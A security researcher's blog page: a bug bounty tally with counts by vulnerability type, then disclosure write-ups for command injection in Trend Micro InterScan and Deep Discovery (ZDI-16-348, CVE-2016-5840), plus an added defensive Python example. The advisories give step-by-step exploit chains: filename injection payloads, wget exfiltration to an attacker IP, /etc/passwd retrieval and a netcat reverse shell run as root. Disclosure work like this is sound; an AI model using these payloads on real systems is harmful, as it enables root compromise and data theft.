100 Bugs in 30 Days

Being a part-time bug bounty hunter, I was doing a little reading and was inspired by Shubham Shah, who posted about his efforts to get 120 Bounties in 120 days.  I came across this article quite some time ago, and it has weighed heavily ever since.  Ultimately I decided to follow suit with a slightly more realistic goal of 100 bugs in a YEAR.  After all, I bug hunt on the weekends and evenings.  I can’t go full time, so a year seemed much more realistic.

Oh, but I can hear you saying, “WTF Korr, this post says 100 bugs in 30 days!  You canz no counterz! lolz”.  First off, stop talking like that, it’s extremely annoying.  Second, that’s no typo.  So here is what happened.  I started my 100 bugs in a year journey on November 20th.  It was a strong start with 3 bugs in the first day.  Then something magical happened.  My voice started cracking, and hair started grow…oop, wrong kind of magical.  The important thing that happened was twofold.  First, a HUGE program opened on the 20th (yes, same day).  I started shaking and dove right into the massive scope.  If you are involved with this particular program, then you know both just how massive the scope really is, and why I am hesitant to identify it.  Though I think there may be a hint somewhere in this post…  But getting in on the ground floor of the new program wasn’t the only alignment in the stars.  A little over a week later, on the 30th, I received an invite to a private program.  I can’t disclose which yet, but the number of invited hackers seems to be relatively small, leaving competition rather sparse.

Getting in on day one of both of these was massive.  However, I was still at a disadvantage because of the need to work nights/weekends.  But diligence has paid off.  My eyes hurt, I am sleep deprived, and my brain feels like a shaken bowl of hot pudding.  But I got a large number of bugs in a short period of time.  As I write this, I have not been green-lit to disclose details about my bugs.  Nor will I until given permission.  I am not allowed to give much information, but metrics are not listed as off limits, especially if I combine programs so as to further obfuscate the origins.  Which means I can at least combine all my bug findings across all the programs, and give a little bit of useful data about my experience.  I will not say which programs resulted in which findings, but will give a little insight into how many bugs per day, the frequency of certain vulnerability types, etc.  Ideally, the disclosures will come very soon.

The first and easiest metric.  100 bugs in 30 days.  Or 3.3333 bugs per day.  Some days I had 0 bugs, others I saw a spike of 10 or more.

Considering this is a race for bugs, I am not ashamed to say I had a rather large quantity of Lows.  So be it.  A risk is a risk.  If they are worth points and/or money, I’m reporting them.  So clearly, this is not a case of 100 RCE vulnerabilities, though there were a few of those 😉  So judge me not, lest ye can do better, and if ye can, mentor my simple ass.

So without further ado, here is a list of bugs by vuln type, in order of frequency (it’s important to note that some of the reports were for ‘multiple instances’, but I am only counting the reports):

  • XSS – 41
  • Error Message/Info Disclosure – 19
  • HTML Injection – 11
  • SQL Injection – 6
  • Authentication Flaws/Bypass – 5
  • Unchecked Redirect – 5
  • CSRF – 4
  • Weak/Default Credentials – 2
  • User Enumeration – 2
  • Misc – 5

NOTE: Misc includes Subdomain Hijack, Insecure Direct Object Reference, External Service Interaction, AV Signature Bypass, and a known RCE vuln

Now for the big question I was dying to know. What is the market value of these bugs?  Given other projects of similar scope (Google and Facebook), here is the estimate (based on publicly disclosed monetary awards and bounty program pages):

Google – $285,000 (rough estimate)

Facebook – Tougher to estimate, but placing the amount smaller than Google at about $160,000

So these are rather unrealistic in the sense that those programs have already been picked over, and finding this number of bugs in them is rather unlikely at the moment.  But what about HackerOne’s own estimates?  They estimate values as listed below:

  • Low
    • Median – 100
    • Competitive – 250
    • Top – 500
  • Medium
    • Median – 150
    • Competitive – 600
    • Top – 1500
  • High
    • Median – 500
    • Competitive – 2500
    • Top – 4000
  • Critical
    • Median – 1400
    • Competitive – 9000
    • Top – 15000

Using these values, the HackerOne Median worth is roughly $22,000.  Using a rough 6x multiple to derive the Top value (because I’m tired of writing this post), I would be looking at $132,000 for Top values.  Or a 4x multiple for Competitive, coming to $88,000.

Sad panda

No matter how I look at the numbers, that’s a solid 5 figures worth of bugs… that I won’t be getting paid for…

Yes, that’s right, no money.  Well, almost none.  I anticipate a couple grand from the private program.  But all the other programs were for points and/or swag.  And even then, the points system was completely screwed up (I will discuss this soon…).  So I will be walking away with a boost in rankings only.

To top it off, I will be posting a rant about the shortfalls of a poorly implemented bug bounty platform.  Get ready, I’m about to bite the hand that feeds me.  But for now, I’m just going to revel in what I accomplished in a month.  I’m happy.  That’s good for now.

Also important to note, I’m still working on the massive…OMFG sized scope program.  I only get points (biting my lip as to why that’s an extra bad rub – more on this later), but those help get invites right?  That’s what I’m told….but I now have my doubts.  Serious doubts.

Multiple Vulnerabilities – Trend Micro Control Manager 6.0

The following are publicly disclosed vulnerabilities I discovered in Trend Micro Control Manager 6.0.

Full details of the vulnerabilities have not been agreed upon for disclosure, so this is more for record keeping than anything else.  Please do not inquire for details as there is no agreement in place for me to divulge any.  As much as I would love to discuss and help, I prefer staying out of jail much more 🙂

  • ZDI-CAN-3634 – Closed without public disclosure (unknown reasoning as it was/is a valid finding)

SQL Injection with RCE:

XXE:

XPATH Injection:

ZDI-16-348: Trend Micro InterScan Web Security ManagePatches filename Remote Code Execution Vulnerability

Version: IWSVA65sp2

Summary:

The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including 'Report Only' users) to execute commands under the context of the root user.

Details:

The com.trend.iwss.gui.servlet.ManagePatches servlet is used by elevated-privilege users to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their own session cookie into the request (below is a stripped-down sample of a valid request).

POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------141658507810329061771972399818
Content-Length: 259

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml"
Content-Type: text/xml

-----------------------------141658507810329061771972399818--

The actual injection takes place in the name of the file being uploaded. By performing the following two tests, the difference in response delay (10 pings versus 30) indicates that command execution is occurring.

Initial test:

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 10"
Content-Type: text/xml

Secondary test:

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 30"
Content-Type: text/xml

This gives any user the ability to execute simple non-interactive commands. However, more complex commands (including a remote shell) are possible.

By issuing a ‘wget <ip>’ of the attacker machine, a response is seen. However, exfiltrating information is a bit more tricky. Special characters like '/', '<', '>' are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the '/'. Below is an example of a user running a wget to retrieve the current user using the given command (where [ip address] is your receiving machine):

Command –

filename="test.xml&wget `echo [ip address]``echo $PATH | cut -c1``id`"

EXPLANATION: using ` (or even $()) to escape, it is possible to pull the '/' character from the current $PATH and insert it into the command, creating the full wget of [ip address]/`id`

Apache Log –

[screenshot of the Apache access log entry; not reproduced]

This grants the ability to exfiltrate some data, as well as upload (via wget) files.

Now the attacker has the ability to create a shell by uploading a file containing the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.xml&wget `echo [ip address]``echo $PATH | cut -c1`shell

Once the file has been uploaded (will be placed in the /var/iwss/patch/bin folder), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

[screenshot not reproduced]

CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability

Version: TDA 2.6.1062r1

Summary:

The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.

Details:

The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used:

POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=---------------------------7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=

-----------------------------7e0823930136
Content-Disposition: form-data; name="ajaxuploader_file"; filename="test.txt"
Content-Type: text/plain

a
-----------------------------7e0823930136--

The actual injection takes place in the name of the file being uploaded (i.e. filename="test.txt&id"). By performing the following request, system information is sent back in the response:

[screenshot of the request and response; not reproduced]

This gives any user the ability to execute simple non-interactive commands. However, more complex commands (including a remote shell) are possible.

Special characters like '/', '<', '>' are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the '/'. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print '/' into the final command):

[screenshot of the request and response; not reproduced]
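The two advisories on this page share one root cause, so here is a single added example that covers both: the ManagePatches servlet's missing authorization check (any authenticated user, 'Report Only' included, could reach it) and the filename-to-shell flaw in both ManagePatches and hotfix_upload.cgi. This is illustration code written for this page, not Trend Micro's; the handler shape, the admin/report_only roles, /tmp/upload and the cp command are assumptions, while /var/iwss/patch/bin is the drop folder the first advisory names. It parses a constructed multipart body carrying the advisory's timing probe as the filename, shows the string a vulnerable handler would hand to /bin/sh -c, and contrasts it with an allowlist-validated argv that no shell ever parses.

```python
import re
from typing import Dict, List

# Added example, not Trend Micro code. Both advisories share one root cause: the
# client-supplied multipart filename ends up on a shell command line. The
# handler shape, the "admin"/"report_only" roles and /tmp/upload are assumptions
# for illustration; /var/iwss/patch/bin is the drop folder the advisory names.

# Constructed request body modelled on the advisory's multipart layout, carrying
# the advisory's timing probe as the filename.
BOUNDARY = "---------------------------141658507810329061771972399818"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="patchFileName"; '
    'filename="test.xml&ping 127.0.0.1 -c 10"\r\n'
    "Content-Type: text/xml\r\n"
    "\r\n"
    "<patch/>\r\n"
    f"--{BOUNDARY}--\r\n"
)

_FILENAME_RE = re.compile(r'filename="([^"\r\n]*)"')


def multipart_filenames(body: str) -> List[str]:
    """Extract every filename= value from the Content-Disposition headers."""
    return _FILENAME_RE.findall(body)


# The control: an allowlist. A patch file is a short basename made of
# alphanumerics, dot, underscore and dash, starting with an alphanumeric.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def is_safe_filename(name: str) -> bool:
    return bool(_SAFE_NAME.match(name)) and ".." not in name


# For alerting only: characters the shell interprets. The advisories show why a
# blocklist is not a control in itself (a filtered '/' was rebuilt from $PATH).
_SHELL_META = re.compile(r"[&|;`$<>(){}\n]")


def looks_like_injection(name: str) -> bool:
    return bool(_SHELL_META.search(name))


def vulnerable_command(name: str) -> str:
    """The unsafe pattern: a string handed to /bin/sh -c, so '&' and backticks
    in the name become extra commands. Returned here, never executed."""
    return f"cp /tmp/upload/{name} /var/iwss/patch/bin/{name}"


def hardened_argv(role: str, name: str) -> List[str]:
    """Authorize, then validate, then build an argv list: no shell parses it."""
    if role != "admin":
        raise PermissionError("patch upload requires the admin role")
    if not is_safe_filename(name):
        raise ValueError(f"rejected filename: {name!r}")
    return ["cp", "--", f"/tmp/upload/{name}", f"/var/iwss/patch/bin/{name}"]


def audit_upload(role: str, body: str) -> Dict[str, object]:
    """Defender-side verdict for one captured request."""
    names = multipart_filenames(body)
    return {
        "filenames": names,
        "suspicious": [n for n in names if looks_like_injection(n)],
        "authorized": role == "admin",
        "accepted": [n for n in names if role == "admin" and is_safe_filename(n)],
    }


if __name__ == "__main__":
    print(audit_upload("report_only", SAMPLE_BODY))
    for n in multipart_filenames(SAMPLE_BODY):
        print("shell would see:", vulnerable_command(n))
```

The allowlist is the control; the metacharacter check only raises an alert, because the advisories show how a per-character blocklist (dropping '/') was rebuilt from $PATH. Passing argv as a list also removes the shell from the path entirely, so a name that slips past validation still cannot grow into a second command.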

Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.txt&wget http:`echo $PATH | cut -c1``echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

[screenshot not reproduced]